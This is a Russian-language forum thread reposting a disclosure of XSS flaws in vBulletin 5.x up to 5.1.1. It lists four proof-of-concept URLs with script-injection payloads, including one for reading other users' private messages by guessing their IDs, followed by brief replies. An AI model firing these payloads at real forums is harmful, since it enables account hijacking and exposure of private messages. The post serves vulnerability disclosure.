форум vBSupport.ru > vBSupport.ru > Безопасность
  • »
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
 
 
 
 
Rebound
Знаток
 
Rebound's Avatar
Default vB5 Connect: Найдены новые xss
6

Не так давно ребята из Romanian Security Team опубликовали уязвимость которая затрагивает всю линейку vBulletin 5.X вплоть до 5.1.1 (далее фиксится патчем)

[XSS] В любой теме

Code:
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//
[XSS] При отправки нового Личного Сообщения

Code:
- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>
[XSS] Просмотр чужих ЛС: Вы должны знать или пробрутить ID личного сообщения, например (830372)

Code:
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//
[DOM XSS] Вкладка "помощь" также уязвима

Code:
- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("Hacked_by_Rebound")>
Источник

Перевод подготовлен специально для проекта VBSupport.org
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
Sven
Front-End Developer
 
Sven's Avatar
Default
0

Не удивительно
 
 
kerk
k0t
 
kerk's Avatar
Default
0

бгг...
 
 
Luvilla
Гость
Default

Quote:
Originally Posted by Rebound View Post
уязвимость ... vBulletin 5.X вплоть до 5.1.1
какая прелесть...
йа плакалЪ...

привет кактусоводам!

@Rebound, из трёх Ваших тем в "кандидатском" эта - самая замечательная...
Спасибо

"Продвинутый" доступ на месяц, набирайте репу, потом стукнете мне в ЛС

Тема переносится в "Безопасность", хоть новость не слишком новая, но всё же...
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 09:06 AM.


Powered by vBulletin® Version 3.6.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Loading...